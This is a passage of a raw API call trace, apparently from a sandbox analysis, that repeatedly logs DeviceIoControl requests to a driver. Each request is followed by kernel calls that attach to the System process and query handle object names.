ApcState=0xfffff880053c85d0) [0240.163] ObReferenceObjectByHandle (in: Handle=0xffffffff800000b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80029ef210, HandleInformation=0x0) returned 0x0 [0240.164] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.164] PsReleaseProcessExitSynchronization () returned 0x2 [0240.164] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.164] ObQueryNameString (in: Object=0xfffffa80029ef210, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.164] ObfDereferenceObject (Object=0xfffffa80029ef210) returned 0x1 [0240.164] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.164] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.164] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.164] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0240.164] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.164] PsAcquireProcessExitSynchronization () returned 0x0 [0240.164] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.165] ObReferenceObjectByHandle (in: Handle=0xffffffff800000b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028df710, HandleInformation=0x0) returned 0x0 [0240.165] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.165] PsReleaseProcessExitSynchronization () returned 0x2 [0240.165] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.165] ObQueryNameString (in: Object=0xfffffa80028df710, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.165] ObfDereferenceObject (Object=0xfffffa80028df710) returned 0x2 [0240.165] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.165] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.165] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.165] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0240.165] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.165] PsAcquireProcessExitSynchronization () returned 0x0 [0240.165] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.166] ObReferenceObjectByHandle (in: Handle=0xffffffff800000b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002987690, HandleInformation=0x0) returned 0x0 [0240.166] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.166] PsReleaseProcessExitSynchronization () returned 0x2 [0240.166] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.166] ObQueryNameString (in: Object=0xfffffa8002987690, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.166] ObfDereferenceObject (Object=0xfffffa8002987690) returned 0x2 [0240.166] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.166] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.166] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.166] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.166] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.166] PsAcquireProcessExitSynchronization () returned 0x0 [0240.167] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.167] ObReferenceObjectByHandle (in: Handle=0xffffffff800000bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002868050, HandleInformation=0x0) returned 0x0 [0240.167] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.167] PsReleaseProcessExitSynchronization () returned 0x2 [0240.167] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.167] ObQueryNameString (in: Object=0xfffffa8002868050, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.167] ObfDereferenceObject (Object=0xfffffa8002868050) returned 0x3 [0240.167] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.167] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.167] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.167] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0240.168] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.168] PsAcquireProcessExitSynchronization () returned 0x0 [0240.168] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.168] ObReferenceObjectByHandle (in: Handle=0xffffffff800000dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8006dff1f0, HandleInformation=0x0) returned 0x0 [0240.168] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.168] PsReleaseProcessExitSynchronization () returned 0x2 [0240.168] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.168] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.168] ObfDereferenceObject (Object=0xfffffa8006dff1f0) returned 0x1 [0240.168] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.168] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.168] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.168] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0240.168] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.168] PsAcquireProcessExitSynchronization () returned 0x0 [0240.168] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.169] ObReferenceObjectByHandle (in: Handle=0xffffffff80000104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8008670f20, HandleInformation=0x0) returned 0x0 [0240.169] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.169] PsReleaseProcessExitSynchronization () returned 0x2 [0240.169] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.169] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.169] ObfDereferenceObject (Object=0xfffffa8008670f20) returned 0x1 [0240.169] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.169] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.169] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.169] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0240.169] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.169] PsAcquireProcessExitSynchronization () returned 0x0 [0240.169] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.169] ObReferenceObjectByHandle (in: Handle=0xffffffff80000108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80093d1f20, HandleInformation=0x0) returned 0x0 [0240.169] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.170] PsReleaseProcessExitSynchronization () returned 0x2 [0240.170] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.170] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.170] ObfDereferenceObject (Object=0xfffffa80093d1f20) returned 0x1 [0240.170] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.170] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.170] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.170] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0240.170] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.170] PsAcquireProcessExitSynchronization () returned 0x0 [0240.170] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.170] ObReferenceObjectByHandle (in: Handle=0xffffffff8000010c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8008bc2f20, HandleInformation=0x0) returned 0x0 [0240.170] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.170] PsReleaseProcessExitSynchronization () returned 0x2 [0240.171] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.171] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.171] ObfDereferenceObject (Object=0xfffffa8008bc2f20) returned 0x1 [0240.171] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.171] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.171] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.171] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0240.171] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.171] PsAcquireProcessExitSynchronization () returned 0x0 [0240.171] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.171] ObReferenceObjectByHandle (in: Handle=0xffffffff80000110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8007bfdf20, HandleInformation=0x0) returned 0x0 [0240.171] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.171] PsReleaseProcessExitSynchronization () returned 0x2 [0240.171] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.171] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.171] ObfDereferenceObject (Object=0xfffffa8007bfdf20) returned 0x1 [0240.172] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.172] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.172] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.172] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0240.172] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.172] PsAcquireProcessExitSynchronization () returned 0x0 [0240.172] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.172] ObReferenceObjectByHandle (in: Handle=0xffffffff80000114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8007bfd050, HandleInformation=0x0) returned 0x0 [0240.172] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.172] PsReleaseProcessExitSynchronization () returned 0x2 [0240.172] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.172] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.172] ObfDereferenceObject (Object=0xfffffa8007bfd050) returned 0x1 [0240.173] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.173] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.173] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.173] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0240.173] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.173] PsAcquireProcessExitSynchronization () returned 0x0 [0240.173] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.173] ObReferenceObjectByHandle (in: Handle=0xffffffff80000118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8008fff050, HandleInformation=0x0) returned 0x0 [0240.173] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.173] PsReleaseProcessExitSynchronization () returned 0x2 [0240.173] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.173] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.173] ObfDereferenceObject (Object=0xfffffa8008fff050) returned 0x1 [0240.173] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.174] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.174] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.174] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0240.174] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.174] PsAcquireProcessExitSynchronization () returned 0x0 [0240.174] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.174] ObReferenceObjectByHandle (in: Handle=0xffffffff80000130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003435f20, HandleInformation=0x0) returned 0x0 [0240.174] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.174] PsReleaseProcessExitSynchronization () returned 0x2 [0240.174] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.174] ObQueryNameString (in: Object=0xfffffa8003435f20, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.174] ObfDereferenceObject (Object=0xfffffa8003435f20) returned 0x1 [0240.174] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.174] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.175] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.175] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0240.175] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.175] PsAcquireProcessExitSynchronization () returned 0x0 [0240.175] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.175] ObReferenceObjectByHandle (in: Handle=0xffffffff80000134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002ebbdd0, HandleInformation=0x0) returned 0x0 [0240.175] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.175] PsReleaseProcessExitSynchronization () returned 0x2 [0240.175] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.175] ObQueryNameString (in: Object=0xfffffa8002ebbdd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.175] ObfDereferenceObject (Object=0xfffffa8002ebbdd0) returned 0x2 [0240.175] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.176] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.176] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.176] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x4a, lpOverlapped=0x0) returned 1 [0240.176] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.176] PsAcquireProcessExitSynchronization () returned 0x0 [0240.176] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.176] ObReferenceObjectByHandle (in: Handle=0xffffffff80000138, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002ebcc10, HandleInformation=0x0) returned 0x0 [0240.176] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.176] PsReleaseProcessExitSynchronization () returned 0x2 [0240.176] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.176] ObQueryNameString (in: Object=0xfffffa8002ebcc10, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.176] ObfDereferenceObject (Object=0xfffffa8002ebcc10) returned 0x1 [0240.176] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.176] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.176] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.177] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0240.177] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.177] PsAcquireProcessExitSynchronization () returned 0x0 [0240.177] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.177] ObReferenceObjectByHandle (in: Handle=0xffffffff80000140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002ebbf20, HandleInformation=0x0) returned 0x0 [0240.177] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.177] PsReleaseProcessExitSynchronization () returned 0x2 [0240.177] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.177] ObQueryNameString (in: Object=0xfffffa8002ebbf20, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.177] ObfDereferenceObject (Object=0xfffffa8002ebbf20) returned 0x1 [0240.177] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.177] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.177] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.177] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.177] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.177] PsAcquireProcessExitSynchronization () returned 0x0 [0240.177] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.177] ObReferenceObjectByHandle (in: Handle=0xffffffff80000158, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80055f67f0, HandleInformation=0x0) returned 0x0 [0240.177] 